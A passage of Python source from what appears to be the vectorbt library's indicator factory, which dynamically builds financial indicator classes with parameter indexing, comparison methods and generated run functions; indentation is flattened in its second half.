        checks.assert_equal(len(col_mapper), n_cols)
    checks.assert_type(short_name, str)
    checks.assert_len_equal(level_names, param_list)
def combine_objs(obj, other, *args, level_name=None, keys=None, **kwargs):
    """Combine/compare `obj` with `other`, e.g. to generate signals.

    Both objects are broadcast together. Pass `other` as a tuple or a list
    to compare against multiple arguments; in that case a new column level
    named `level_name` is created.

    See `vectorbt.base.accessors.BaseAccessor.combine`."""
    multiple = isinstance(other, (tuple, list))
    # Build an index out of the values only when the caller did not supply keys
    if multiple and keys is None:
        keys = index_fns.index_from_values(other, name=level_name)
    return obj.vbt.combine(other, *args, keys=keys, concat=True, **kwargs)
def f(*args):
    """Forward ``*args`` to the ``type`` builtin.

    With one argument this returns the argument's type; with three
    arguments ``(name, bases, namespace)`` it creates a new class.
    """
    result = type(*args)
    return result
class IndicatorFactory:
    def __init__(self,
                 class_name='Indicator',
                 class_docstring='',
                 module_name=__name__,
                 short_name=None,
                 prepend_name=True,
                 input_names=None,
                 param_names=None,
                 in_output_names=None,
                 output_names=None,
                 output_flags=None,
                 custom_output_props=None,
                 attr_settings=None):
        """A factory for creating new indicators.

        Initialize `IndicatorFactory` to create a skeleton and then use a class method
        such as `IndicatorFactory.from_custom_func` to bind a calculation function to the skeleton.

        Args:
            class_name (str): Name for the created indicator class.
            class_docstring (str): Docstring for the created indicator class.
            module_name (str): Specify the module the class originates from.
            short_name (str): A short name of the indicator.

                Defaults to lower-case `class_name`.
            prepend_name (bool): Whether to prepend `short_name` to each parameter level.
            input_names (list of str): A list of names of input arrays.
            param_names (list of str): A list of names of parameters.
            in_output_names (list of str): A list of names of in-place output arrays.

                An in-place output is an output that is not returned but modified in-place.
                Some advantages of such outputs include:

                1) they don't need to be returned,
                2) they can be passed between functions as easily as inputs,
                3) they can be provided with already allocated data to save memory,
                4) if data or default value are not provided, they are created empty to not occupy memory.
            output_names (list of str): A list of names of output arrays.
            output_flags (dict): A dictionary of in-place and regular output flags.
            custom_output_props (dict): A dictionary with user-defined functions that will be
                bound to the indicator class and (if not a property) wrapped with `@cached_property`.
            attr_settings (dict): A dictionary of settings by attribute name.

                Attributes can be `input_names`, `in_output_names`, `output_names` and `custom_output_props`.

                Following keys are accepted:

                * `dtype`: Data type used to determine which methods to generate around this attribute.
                    Set to None to disable. Default is `np.float_`. Can be set to instance of
                    `collections.namedtuple` acting as enumerated type; it will then create a property
                    with suffix `readable` that contains data in a string format.

        !!! note
            The `__init__` method is not used for running the indicator, for this use `run`.
            The reason for this is indexing, which requires a clean `__init__` method for creating
            a new indicator object with newly indexed attributes.
        """
        # Check and save parameters
        self.class_name = class_name
        checks.assert_type(class_name, str)
        self.class_docstring = class_docstring
        checks.assert_type(class_docstring, str)
        self.module_name = module_name
        if module_name is not None:
            checks.assert_type(module_name, str)
        # Default short name: 'custom' for the generic class name, else the lower-cased class name
        if short_name is None:
            if class_name == 'Indicator':
                short_name = 'custom'
            else:
                short_name = class_name.lower()
        self.short_name = short_name
        checks.assert_type(short_name, str)
        self.prepend_name = prepend_name
        checks.assert_type(prepend_name, bool)
        if input_names is None:
            input_names = []
        checks.assert_type(input_names, (tuple, list))
        self.input_names = input_names
        if param_names is None:
            param_names = []
        checks.assert_type(param_names, (tuple, list))
        self.param_names = param_names
        if in_output_names is None:
            in_output_names = []
        checks.assert_type(in_output_names, (tuple, list))
        self.in_output_names = in_output_names
        if output_names is None:
            output_names = []
        checks.assert_type(output_names, (tuple, list))
        self.output_names = output_names
        # At least one output (in-place or regular) is required for a meaningful indicator
        all_output_names = in_output_names + output_names
        if len(all_output_names) == 0:
            raise ValueError("Must have at least one in-place or regular output")
        if output_flags is None:
            output_flags = {}
        checks.assert_type(output_flags, dict)
        if len(output_flags) > 0:
            checks.assert_dict_valid(output_flags, [all_output_names])
        self.output_flags = output_flags
        if custom_output_props is None:
            custom_output_props = {}
        checks.assert_type(custom_output_props, dict)
        self.custom_output_props = custom_output_props
        if attr_settings is None:
            attr_settings = {}
        checks.assert_type(attr_settings, dict)
        # Attribute settings may target inputs, outputs, and custom output properties
        all_attr_names = input_names + all_output_names + list(custom_output_props.keys())
        if len(attr_settings) > 0:
            checks.assert_dict_valid(attr_settings, [all_attr_names])
        self.attr_settings = attr_settings

        # Set up class
        # An extra 'tuple' indexer is built when there is more than one parameter,
        # so users can also select columns by parameter combinations
        ParamIndexer = ParamIndexerFactory(
            param_names + (['tuple'] if len(param_names) > 1 else []),
            module_name=module_name
        )
        # The indicator class is created dynamically via the 3-arg type() builtin
        Indicator = type(self.class_name, (Wrapping, ParamIndexer), {})
        Indicator.__doc__ = self.class_docstring
        if module_name is not None:
            Indicator.__module__ = self.module_name

        # Add indexing methods
        def _indexing_func(obj, pd_indexing_func, **kwargs):
            # Slices every stored array/mapper along rows and columns and returns a new instance
            new_wrapper, idx_idxs, _, col_idxs = obj.wrapper._indexing_func_meta(pd_indexing_func, **kwargs)
            idx_idxs_arr = reshape_fns.to_1d(idx_idxs, raw=True)
            col_idxs_arr = reshape_fns.to_1d(col_idxs, raw=True)
            # Replace full-range selections with slices to avoid unnecessary copying
            if np.array_equal(idx_idxs_arr, np.arange(obj.wrapper.shape_2d[0])):
                idx_idxs_arr = slice(None, None, None)
            if np.array_equal(col_idxs_arr, np.arange(obj.wrapper.shape_2d[1])):
                col_idxs_arr = slice(None, None, None)
            input_mapper = getattr(obj, '_input_mapper', None)
            if input_mapper is not None:
                input_mapper = input_mapper[col_idxs_arr]
            input_list = []
            for input_name in input_names:
                # Inputs are only indexed along rows; columns are handled by the input mapper
                input_list.append(getattr(obj, f'_{input_name}')[idx_idxs_arr])
            in_output_list = []
            for in_output_name in in_output_names:
                in_output_list.append(getattr(obj, f'_{in_output_name}')[idx_idxs_arr, :][:, col_idxs_arr])
            output_list = []
            for output_name in output_names:
                output_list.append(getattr(obj, f'_{output_name}')[idx_idxs_arr, :][:, col_idxs_arr])
            param_list = []
            for param_name in param_names:
                # Parameter arrays are column-independent, so they are carried over unchanged
                param_list.append(getattr(obj, f'_{param_name}_array'))
            mapper_list = []
            for param_name in param_names:
                # Tuple mapper is a list because of its complex data type
                mapper_list.append(getattr(obj, f'_{param_name}_mapper')[col_idxs_arr])

            return obj.copy(
                wrapper=new_wrapper,
                input_list=input_list,
                input_mapper=input_mapper,
                in_output_list=in_output_list,
                output_list=output_list,
                param_list=param_list,
                mapper_list=mapper_list
            )

        setattr(Indicator, '_indexing_func', _indexing_func)

        # Create read-only properties
        prop = property(lambda _self: _self._short_name)
        prop.__doc__ = "Name of the indicator."
        setattr(Indicator, 'short_name', prop)

        prop = property(lambda _self: _self._level_names)
        prop.__doc__ = "Column level names corresponding to each parameter."
        setattr(Indicator, 'level_names', prop)

        prop = classproperty(lambda _self: input_names)
        prop.__doc__ = "Names of the input arrays."
        setattr(Indicator, 'input_names', prop)

        prop = classproperty(lambda _self: param_names)
        prop.__doc__ = "Names of the parameters."
        setattr(Indicator, 'param_names', prop)

        prop = classproperty(lambda _self: in_output_names)
        prop.__doc__ = "Names of the in-place output arrays."
        setattr(Indicator, 'in_output_names', prop)

        prop = classproperty(lambda _self: output_names)
        prop.__doc__ = "Names of the regular output arrays."
        setattr(Indicator, 'output_names', prop)

        prop = classproperty(lambda _self: output_flags)
        prop.__doc__ = "Dictionary of output flags."
        setattr(Indicator, 'output_flags', prop)

        for param_name in param_names:
            # NOTE: param_name is bound as a default argument to avoid the
            # late-binding closure pitfall inside this loop
            prop = property(lambda _self, param_name=param_name: getattr(_self, f'_{param_name}_array'))
            prop.__doc__ = f"Array of `{param_name}` combinations."
            setattr(Indicator, f'{param_name}_array', prop)

        for input_name in input_names:
            def input_prop(_self, input_name=input_name):
                """Input array."""
                # Tile input columns to match the wrapper's columns via the input mapper
                old_input = reshape_fns.to_2d(getattr(_self, '_' + input_name), raw=True)
                input_mapper = getattr(_self, '_input_mapper')
                if input_mapper is None:
                    return _self.wrapper.wrap(old_input)
                return _self.wrapper.wrap(old_input[:, input_mapper])

            input_prop.__name__ = input_name
            # Cached: the wrapped (and potentially tiled) input is computed once per instance
            setattr(Indicator, input_name, cached_property(input_prop))

        for output_name in all_output_names:
            # NOTE: _output_name is bound as a default argument (late-binding pitfall)
            def output_prop(_self, _output_name=output_name):
                return _self.wrapper.wrap(getattr(_self, '_' + _output_name))

            if output_name in in_output_names:
                output_prop.__doc__ = """In-place output array."""
            else:
                output_prop.__doc__ = """Output array."""

            output_prop.__name__ = output_name
            if output_name in output_flags:
                # Append user-provided flags to the property docstring
                _output_flags = output_flags[output_name]
                if isinstance(_output_flags, (tuple, list)):
                    _output_flags = ', '.join(_output_flags)
                output_prop.__doc__ += "\n\n" + _output_flags
            setattr(Indicator, output_name, property(output_prop))

        # Add __init__ method
        def __init__(_self, wrapper, input_list, input_mapper, in_output_list, output_list,
                     param_list, mapper_list, short_name, level_names):
            perform_init_checks(
                wrapper,
                input_list,
                input_mapper,
                in_output_list,
                output_list,
                param_list,
                mapper_list,
                short_name,
                level_names
            )
            Wrapping.__init__(
                _self,
                wrapper,
                input_list=input_list,
                input_mapper=input_mapper,
                in_output_list=in_output_list,
                output_list=output_list,
                param_list=param_list,
                mapper_list=mapper_list,
                short_name=short_name,
                level_names=level_names
            )

            # Bind all artifacts as private attributes; the generated properties above read them
            for i, ts_name in enumerate(input_names):
                setattr(_self, f'_{ts_name}', input_list[i])
            setattr(_self, '_input_mapper', input_mapper)
            for i, in_output_name in enumerate(in_output_names):
                setattr(_self, f'_{in_output_name}', in_output_list[i])
            for i, output_name in enumerate(output_names):
                setattr(_self, f'_{output_name}', output_list[i])
            for i, param_name in enumerate(param_names):
                setattr(_self, f'_{param_name}_array', param_list[i])
                setattr(_self, f'_{param_name}_mapper', mapper_list[i])
            # With multiple parameters, also build a mapper of parameter tuples per column
            if len(param_names) > 1:
                tuple_mapper = list(zip(*list(mapper_list)))
                setattr(_self, '_tuple_mapper', tuple_mapper)
            else:
                tuple_mapper = None
            setattr(_self, '_short_name', short_name)
            setattr(_self, '_level_names', level_names)

            # Initialize indexers
            mapper_sr_list = []
            for i, m in enumerate(mapper_list):
                mapper_sr_list.append(pd.Series(m, index=wrapper.columns))
            if tuple_mapper is not None:
                mapper_sr_list.append(pd.Series(tuple_mapper, index=wrapper.columns))
            ParamIndexer.__init__(
                _self, mapper_sr_list,
                level_names=[*level_names, tuple(level_names)]
            )

        setattr(Indicator, '__init__', __init__)

        # Add user-defined outputs
        for prop_name, prop in custom_output_props.items():
            if prop.__doc__ is None:
                prop.__doc__ = f"""Custom property."""
            # Plain functions are cached; existing (cached_)properties are bound as-is
            if not isinstance(prop, (property, cached_property)):
                prop.__name__ = prop_name
                prop = cached_property(prop)
            setattr(Indicator, prop_name, prop)

        # Add comparison & combination methods for all inputs, outputs, and user-defined properties
        for attr_name in all_attr_names:
            _attr_settings = attr_settings.get(attr_name, {})
            checks.assert_dict_valid(_attr_settings, [['dtype']])
            dtype = _attr_settings.get('dtype', np.float_)
            if checks.is_namedtuple(dtype):
                # Enumerated dtype: expose a `*_readable` property mapping codes to field names
                # (-1 is treated as a missing value and rendered as an empty string)
                def attr_readable(_self, attr_name=attr_name, enum=dtype):
                    if _self.wrapper.ndim == 1:
                        return getattr(_self, attr_name).map(lambda x: '' if x == -1 else enum._fields[x])
                    return getattr(_self, attr_name).applymap(lambda x: '' if x == -1 else enum._fields[x])

                attr_readable.__qualname__ = f'{Indicator.__name__}.{attr_name}_readable'
                attr_readable.__doc__ = f"""{attr_name} in readable format based on enum {dtype}."""
                setattr(Indicator, f'{attr_name}_readable', property(attr_readable))
            elif np.issubdtype(dtype, np.number):
                # Numeric dtype: generate `*_above`, `*_below` and `*_equal` comparison methods
                def assign_numeric_method(func_name, combine_func, attr_name=attr_name):
                    def numeric_method(_self, other, crossover=False, wait=0, after_false=True,
                                       level_name=None, prepend_name=prepend_name, **kwargs):
                        if isinstance(other, _self.__class__):
                            other = getattr(other, attr_name)
                        if level_name is None:
                            if prepend_name:
                                if attr_name == _self.short_name:
                                    level_name = f'{_self.short_name}_{func_name}'
                                else:
                                    level_name = f'{_self.short_name}_{attr_name}_{func_name}'
                            else:
                                level_name = f'{attr_name}_{func_name}'
                        out = combine_objs(
                            getattr(_self, attr_name),
                            other,
                            combine_func=combine_func,
                            level_name=level_name,
                            **kwargs
                        )
                        if crossover:
                            return out.vbt.signals.nst(wait + 1, after_false=after_false)
                        return out

                    numeric_method.__qualname__ = f'{Indicator.__name__}.{attr_name}_{func_name}'
                    numeric_method.__doc__ = f"""Return True for each element where `{attr_name}` is {func_name} `other`.

                Set `crossover` to True to return the first True after crossover. Specify `wait` to return
                True only when `{attr_name}` is {func_name} for a number of time steps in a row after crossover.

                See `vectorbt.indicators.factory.combine_objs`."""
                    setattr(Indicator, f'{attr_name}_{func_name}', numeric_method)

                assign_numeric_method('above', np.greater)
                assign_numeric_method('below', np.less)
                assign_numeric_method('equal', np.equal)
            elif np.issubdtype(dtype, np.bool_):
                # Boolean dtype: generate `*_and`, `*_or` and `*_xor` combination methods
                def assign_bool_method(func_name, combine_func, attr_name=attr_name):
                    def bool_method(_self, other, level_name=None, prepend_name=prepend_name, **kwargs):
                        if isinstance(other, _self.__class__):
                            other = getattr(other, attr_name)
                        if level_name is None:
                            if prepend_name:
                                if attr_name == _self.short_name:
                                    level_name = f'{_self.short_name}_{func_name}'
                                else:
                                    level_name = f'{_self.short_name}_{attr_name}_{func_name}'
                            else:
                                level_name = f'{attr_name}_{func_name}'
                        return combine_objs(
                            getattr(_self, attr_name),
                            other,
                            combine_func=combine_func,
                            level_name=level_name,
                            **kwargs
                        )

                    bool_method.__qualname__ = f'{Indicator.__name__}.{attr_name}_{func_name}'
                    bool_method.__doc__ = f"""Return `{attr_name} {func_name.upper()} other`.

                See `vectorbt.indicators.factory.combine_objs`."""
                    setattr(Indicator, f'{attr_name}_{func_name}', bool_method)

                assign_bool_method('and', np.logical_and)
                assign_bool_method('or', np.logical_or)
                assign_bool_method('xor', np.logical_xor)

        self.Indicator = Indicator
def from_custom_func(self,
custom_func,
require_input_shape=False,
param_settings=None,
in_output_settings=None,
hide_params=None,
hide_default=True,
var_args=False,
keyword_only_args=False,
**pipeline_kwargs):
"""Build indicator class around a custom calculation function.
In contrast to `IndicatorFactory.from_apply_func`, this method offers full flexbility.
It's up to we to handle caching and concatenate columns for each parameter (for example,
by using `vectorbt.base.combine_fns.apply_and_concat_one`). Also, you should ensure that
each output array has an appropriate number of columns, which is the number of columns in
input arrays multiplied by the number of parameter combinations.
Args:
custom_func (callable): A function that takes broadcast arrays corresponding
to `input_names`, broadcast in-place output arrays corresponding to `in_output_names`,
broadcast parameter arrays corresponding to `param_names`, and other arguments and
keyword arguments, and returns outputs corresponding to `output_names` and other objects
that are then returned with the indicator instance.
Can be Numba-compiled.
!!! note
Shape of each output should be the same and match the shape of each input stacked
n times (= the number of parameter values) along the column axis.
require_input_shape (bool): Whether to input shape is required.
param_settings (dict): A dictionary of parameter settings keyed by name.
See `run_pipeline` for keys.
Can be overwritten by any run method.
in_output_settings (dict): A dictionary of in-place output settings keyed by name.
See `run_pipeline` for keys.
Can be overwritten by any run method.
hide_params (list): Parameter names to hide column levels for.
Can be overwritten by any run method.
hide_default (bool): Whether to hide column levels of parameters with default value.
Can be overwritten by any run method.
var_args (bool): Whether run methods should accept variable arguments (`*args`).
Set to True if `custom_func` accepts positional agruments that are not listed in the config.
keyword_only_args (bool): Whether run methods should accept keyword-only arguments (`*`).
Set to True to force the user to use keyword arguments (e.g., to avoid misplacing arguments).
**pipeline_kwargs: Keyword arguments passed to `run_pipeline`.
Can be overwritten by any run method.
Can contain default values for `param_names` and `in_output_names`,
but also custom positional and keyword arguments passed to the `custom_func`.
Returns:
`Indicator`, and optionally other objects that are returned by `custom_func`
and exceed `output_names`.
## Example
The following example produces the same indicator as the `IndicatorFactory.from_apply_func` example.
```python-repl
>>> @njit
>>> def apply_func_nb(i, ts1, ts2, p1, p2, arg1, arg2):
... return ts1 * p1[i] + arg1, ts2 * p2[i] + arg2
>>> @njit
... def custom_func(ts1, ts2, p1, p2, arg1, arg2):
... return vbt.base.combine_fns.apply_and_concat_multiple_nb(
... len(p1), apply_func_nb, ts1, ts2, p1, p2, arg1, arg2)
>>> MyInd = vbt.IndicatorFactory(
... input_names=['ts1', 'ts2'],
... param_names=['p1', 'p2'],
... output_names=['o1', 'o2']
... ).from_custom_func(custom_func, var_args=True, arg2=200)
>>> myInd = MyInd.run(price, price * 2, [1, 2], [3, 4], 100)
>>> myInd.o1
custom_p1 1 2
custom_p2 3 4
a b a b
2020-01-01 101.0 105.0 102.0 110.0
2020-01-02 102.0 104.0 104.0 108.0
2020-01-03 103.0 103.0 106.0 106.0
2020-01-04 104.0 102.0 108.0 104.0
2020-01-05 105.0 101.0 110.0 102.0
>>> myInd.o2
custom_p1 1 2
custom_p2 3 4
a b a b
2020-01-01 206.0 230.0 208.0 240.0
2020-01-02 212.0 224.0 216.0 232.0
2020-01-03 218.0 218.0 224.0 224.0
2020-01-04 224.0 212.0 232.0 216.0
2020-01-05 230.0 206.0 240.0 208.0
```
The difference between `apply_func_nb` here and in `IndicatorFactory.from_apply_func` is that
here it takes the index of the current parameter combination that can be used for parameter selection.
You can also remove the entire `apply_func_nb` and define your logic in `custom_func`
(which shouldn't necessarily be Numba-compiled):
```python-repl
>>> @njit
... def custom_func(ts1, ts2, p1, p2, arg1, arg2):
... input_shape = ts1.shape
... n_params = len(p1)
... out1 = np.empty((input_shape[0], input_shape[1] * n_params), dtype=np.float_)
... out2 = np.empty((input_shape[0], input_shape[1] * n_params), dtype=np.float_)
... for k in range(n_params):
... for col in range(input_shape[1]):
... for i in range(input_shape[0]):
... out1[i, input_shape[1] * k + col] = ts1[i, col] * p1[k] + arg1
... out2[i, input_shape[1] * k + col] = ts2[i, col] * p2[k] + arg2
... return out1, out2
```
"""
Indicator = self.Indicator
short_name = self.short_name
prepend_name = self.prepend_name
input_names = self.input_names
param_names = self.param_names
in_output_names = self.in_output_names
output_names = self.output_names
all_input_names = input_names + param_names + in_output_names
setattr(Indicator, 'custom_func', custom_func)
def _merge_settings(old_settings, new_settings, allowed_keys=None):
new_settings = merge_dicts(old_settings, new_settings)
if len(new_settings) > 0 and allowed_keys is not None:
checks.assert_dict_valid(new_settings, allowed_keys)
return new_settings
def _resolve_refs(input_list, param_list, in_output_list):
# You can reference anything between inputs, parameters, and in-place outputs
# even parameter to input (thanks to broadcasting)
all_inputs = list(input_list + param_list + in_output_list)
for i in range(len(all_inputs)):
input = all_inputs[i]
is_default = False
if isinstance(input, DefaultParam):
input = input.value
is_default = True
if isinstance(input, str):
if input in all_input_names:
new_input = all_inputs[all_input_names.index(input)]
if is_default:
new_input = DefaultParam(new_input)
all_inputs[i] = new_input
input_list = all_inputs[:len(input_list)]
all_inputs = all_inputs[len(input_list):]
param_list = all_inputs[:len(param_list)]
in_output_list = all_inputs[len(param_list):]
return input_list, param_list, in_output_list
def _extract_inputs(args):
input_list = args[:len(input_names)]
checks.assert_len_equal(input_list, input_names)
args = args[len(input_names):]
param_list = args[:len(param_names)]
checks.assert_len_equal(param_list, param_names)
args = args[len(param_names):]
in_output_list = args[:len(in_output_names)]
checks.assert_len_equal(in_output_list, in_output_names)
args = args[len(in_output_names):]
if not var_args and len(args) > 0:
raise TypeError("Variable length arguments are not supported by this function "
"(var_args is set to False)")
input_list, param_list, in_output_list = _resolve_refs(input_list, param_list, in_output_list)
return input_list, param_list, in_output_list, args
for k, v in pipeline_kwargs.items():
if k in param_names and not isinstance(v, DefaultParam):
pipeline_kwargs[k] = DefaultParam(v) # track default params
pipeline_kwargs = merge_dicts({k: None for k in in_output_names}, pipeline_kwargs)
# Display default parameters and in-place outputs in the signature
default_kwargs = {}
for k in list(pipeline_kwargs.keys()):
if k in input_names or k in param_names or k in in_output_names:
default_kwargs[k] = pipeline_kwargs.pop(k)
if var_args and keyword_only_args:
raise ValueError("var_args and keyword_only_args cannot be used together")
# Add private run method
def_run_kwargs = dict(
short_name=short_name,
hide_params=hide_params,
hide_default=hide_default,
**default_kwargs
)
@classmethod
def _run(cls,
*args,
_param_settings=param_settings,
_in_output_settings=in_output_settings,
_pipeline_kwargs=pipeline_kwargs,
**kwargs):
_short_name = kwargs.pop('short_name', def_run_kwargs['short_name'])
_hide_params = kwargs.pop('hide_params', def_run_kwargs['hide_params'])
_hide_default = kwargs.pop('hide_default', def_run_kwargs['hide_default'])
_param_settings = _merge_settings(
_param_settings,
kwargs.pop('param_settings', {}),
[param_names]
)
_in_output_settings = _merge_settings(
_in_output_settings,
kwargs.pop('in_output_settings', {}),
[in_output_names]
)
if _hide_params is None:
_hide_params = []
args = list(args)
# Extract inputs
input_list, param_list, in_output_list, args = _extract_inputs(args)
# Prepare column levels
level_names = []
hide_levels = []
for i, pname in enumerate(param_names):
level_name = _short_name + '_' + pname if prepend_name else pname
level_names.append(level_name)
if pname in _hide_params or (_hide_default and isinstance(param_list[i], DefaultParam)):
hide_levels.append(i)
level_names = list(level_names)
param_list = [params.value if isinstance(params, DefaultParam) else params for params in param_list]
# Run the pipeline
results = run_pipeline(
len(output_names), # number of returned outputs
custom_func,
*args,
require_input_shape=require_input_shape,
input_list=input_list,
in_output_list=in_output_list,
param_list=param_list,
level_names=level_names,
hide_levels=hide_levels,
param_settings=[_param_settings.get(n, {}) for n in param_names],
in_output_settings=[_in_output_settings.get(n, {}) for n in in_output_names],
**merge_dicts(_pipeline_kwargs, kwargs)
)
# Return the raw result if any of the flags are set
if kwargs.get('return_raw', False) or kwargs.get('return_cache', False):
return results
# Unpack the result
wrapper, \
new_input_list, \
input_mapper, \
in_output_list, \
output_list, \
new_param_list, \
mapper_list, \
other_list = results
# Create a new instance
obj = cls(
wrapper,
new_input_list,
input_mapper,
in_output_list,
output_list,
new_param_list,
mapper_list,
short_name,
level_names
)
if len(other_list) > 0:
return (obj, *tuple(other_list))
return obj
setattr(Indicator, '_run', _run)
# Add public run method
# Create function dynamically to provide user with a proper signature
def compile_run_function(func_name, docstring, default_kwargs):
pos_names = []
main_kw_names = []
other_kw_names = []
for k in input_names + param_names:
if k in default_kwargs:
main_kw_names.append(k)
else:
pos_names.append(k)
main_kw_names.extend(in_output_names) # in_output_names are keyword-only
for k, v in default_kwargs.items():
if k not in pos_names and k not in main_kw_names:
other_kw_names.append(k)
_0 = func_name
_1 = '*, ' if keyword_only_args else ''
_2 = []
if require_input_shape:
_2.append('input_shape')
_2.extend(pos_names)
_2 = ', '.join(_2) + ', ' if len(_2) > 0 else ''
_3 = '*args, ' if var_args else ''
_4 = ['{}={}'.format(k, k) for k in main_kw_names + other_kw_names]
_4 = ', '.join(_4) + ', ' if len(_4) > 0 else ''
_5 = docstring
_6 = all_input_names
_6 = ', '.join(_6) + ', ' if len(_6) > 0 else ''
_7 = []
if require_input_shape:
_7.append('input_shape')
_7.extend(other_kw_names)
_7 = ['{}={}'.format(k, k) for k in _7]
_7 = ', '.join(_7) + ', ' if len(_7) > 0 else ''
func_str = "@classmethod\n" \
"def {0}(cls, {1}{2}{3}{4}**kwargs):\n" \
" \"\"\"{5}\"\"\"\n" \
" return cls._{0}({6}{3}{7}**kwargs)".format(
_0, _1, _2, _3, _4, _5, _6, _7
)
scope = {**dict(DefaultParam=DefaultParam), **default_kwargs}
filename = inspect.getfile(lambda: None)
code = compile(func_str, filename, 'single')
exec(code, scope)
return scope[func_name]
_0 = self.class_name
_1 = ''
if len(self.input_names) > 0:
_1 += '\n* Inputs: ' + ', '.join(map(lambda x: f'`{x}`', self.input_names))
if len(self.in_output_names) > 0:
_1 += '\n* In-place outputs: ' + ', '.join(map(lambda x: f'`{x}`', self.in_output_names))
if len(self.param_names) > 0:
_1 += '\n* Parameters: ' + ', '.join(map(lambda x: f'`{x}`', self.param_names))
if len(self.output_names) > 0:
_1 += '\n* Outputs: ' + ', '.join(map(lambda x: f'`{x}`', self.output_names))
run_docstring = """Run `{0}` indicator.
{1}
Pass a list of parameter names as `hide_params` to hide their column levels.
Set `hide_default` to False to show the column levels of the parameters with a default value.
Other keyword arguments are passed to `vectorbt.indicators.factory.run_pipeline`.""".format(_0, _1)
run = compile_run_function('run', run_docstring, def_run_kwargs)
setattr(Indicator, 'run', run)
if len(param_names) > 0:
# Add private run_combs method
def_run_combs_kwargs = dict(
r=2,
param_product=False,
comb_func=itertools.combinations,
speedup=True,
short_names=None,
hide_params=hide_params,
hide_default=hide_default,
**default_kwargs
)
@classmethod
def _run_combs(cls,
*args,
_param_settings=param_settings,
**kwargs):
_r = kwargs.pop('r', def_run_combs_kwargs['r'])
_param_product = kwargs.pop('param_product', def_run_combs_kwargs['param_product'])
_comb_func = kwargs.pop('comb_func', def_run_combs_kwargs['comb_func'])
_speedup = kwargs.pop('speedup', def_run_combs_kwargs['speedup'])
_short_names = kwargs.pop('short_names', def_run_combs_kwargs['short_names'])
_hide_params = kwargs.pop('hide_params', def_run_kwargs['hide_params'])
_hide_default = kwargs.pop('hide_default', def_run_kwargs['hide_default'])
_param_settings = _merge_settings(
_param_settings,
kwargs.get('param_settings', {}), # get, not pop
[param_names]
)
if _hide_params is None:
_hide_params = []
if _short_names is None:
_short_names = [f'{short_name}_{str(i + 1)}' for i in range(_r)]
args = list(args)
# Extract inputs
input_list, param_list, in_output_list, args = _extract_inputs(args)
# Hide params
for i, pname in enumerate(param_names):
if _hide_default and isinstance(param_list[i], DefaultParam):
if pname not in _hide_params:
_hide_params.append(pname)
param_list[i] = param_list[i].value
checks.assert_len_equal(param_list, param_names)
# Prepare params
param_settings_list = [_param_settings.get(n, {}) for n in param_names]
for i in range(len(param_list)):
is_tuple = param_settings_list[i].get('is_tuple', False)
is_array_like = param_settings_list[i].get('is_array_like', False)
param_list[i] = params_to_list(param_list[i], is_tuple, is_array_like)
if _param_product:
param_list = create_param_product(param_list)
else:
param_list = broadcast_params(param_list)
if not isinstance(param_list, (tuple, list)):
param_list = [param_list]
# Speed up by pre-calculating raw outputs
if _speedup:
raw_results = cls._run(
*input_list,
*param_list,
*in_output_list,
*args,
return_raw=True,
speedup=False,
**kwargs
)
kwargs['use_raw'] = raw_results # use them next time
# Generate indicator instances
instances = []
if _comb_func == itertools.product:
param_lists = zip(*_comb_func(zip(*param_list), repeat=_r))
else:
param_lists = zip(*_comb_func(zip(*param_list), _r))
for i, param_list in enumerate(param_lists):
instances.append(cls._run(
*input_list,
*zip(*param_list),
*in_output_list,
*args,
short_name=_short_names[i],
hide_params=_hide_params,
hide_default=_hide_default,
speedup=False,
**kwargs
))
return tuple(instances)
setattr(Indicator, '_run_combs', _run_combs)
# Add public run_combs method
_0 = self.class_name
_1 = ''
if len(self.input_names) > 0:
_1 += '\n* Inputs: ' + ', '.join(map(lambda x: f'`{x}`', self.input_names))
if len(self.in_output_names) > 0:
_1 += '\n* In-place outputs: ' + ', '.join(map(lambda x: f'`{x}`', self.in_output_names))
if len(self.param_names) > 0:
_1 += '\n* Parameters: ' + ', '.join(map(lambda x: f'`{x}`', self.param_names))
if len(self.output_names) > 0:
_1 += '\n* Outputs: ' + ', '.join(map(lambda x: f'`{x}`', self.output_names))
run_combs_docstring = """Create a combination of multiple `{0}` indicators using function `comb_func`.
{1}
`comb_func` must accept an iterable of parameter tuples and `r`.
Also accepts all combinatoric iterators from itertools such as `itertools.combinations`.
Pass `r` to specify how many indicators to run.
Pass `short_names` to specify the short name for each indicator.
Set `speedup` to True to first compute raw outputs for all parameters,
and then use them to build each indicator (faster).
Other keyword arguments are passed to `{0}.run`.""".format(_0, _1)
run_combs = compile_run_function('run_combs', run_combs_docstring, def_run_combs_kwargs)
setattr(Indicator, 'run_combs', run_combs)
return Indicator
def from_apply_func(self, apply_func, cache_func=None, pass_packed=False, kwargs_to_args=None,
numba_loop=False, use_ray=False, ray_kwargs=None, **kwargs):
"""Build indicator class around a custom apply function.
In contrast to `IndicatorFactory.from_custom_func`, this method handles a lot of things for you,
such as caching, parameter selection, and concatenation. Your part is writing a function `apply_func`
that accepts a selection of parameters (single values as opposed to multiple values in
`IndicatorFactory.from_custom_func`) and does the calculation. It then automatically concatenates
the resulting arrays into a single array per output.
While this approach is simpler, it's also less flexible, since we can only work with
one parameter selection at a time and can't view all parameters. The UDF `apply_func` also can't
take keyword arguments, nor it can return anything other than outputs listed in `output_names`.
!!! note
If `apply_func` is a Numba-compiled function:
* All inputs are automatically converted to NumPy arrays
* Each argument in `*args` must be of a Numba-compatible type
* You cannot pass keyword arguments
* Your outputs must be arrays of the same shape, data type and data order
Args:
apply_func (callable): A function that takes inputs, selection of parameters, and
other arguments, and does calculations to produce outputs.
Arguments are passed to `apply_func` in the following order:
* `input_shape` if `pass_input_shape` is set to True and `input_shape` not in `kwargs_to_args`
* `col` if `per_column` and `pass_col` are set to True and `col` not in `kwargs_to_args`
* broadcast time-series arrays corresponding to `input_names`
* broadcast in-place output arrays corresponding to `in_output_names`
* single parameter selection corresponding to `param_names`
* variable arguments if `var_args` is set to True
* arguments listed in `kwargs_to_args`
* `flex_2d` if `pass_flex_2d` is set to True and `flex_2d` not in `kwargs_to_args`
* keyword arguments if `apply_func` is not Numba-compiled
Can be Numba-compiled.
!!! note
Shape of each output should be the same and match the shape of each input.
cache_func (callable): A caching function to preprocess data beforehand.
Takes the same arguments as `apply_func`. Should return a single object or a tuple of objects.
All returned objects will be passed unpacked as last arguments to `apply_func`.
Can be Numba-compiled.
pass_packed (bool): Whether to pass packed tuples for inputs, in-place outputs, and parameters.
kwargs_to_args (list of str): Keyword arguments from `kwargs` dict to pass as
positional arguments to the apply function.
Should be used together with `numba_loop` set to True since Numba doesn't support
variable keyword arguments.
Defaults to []. Order matters.
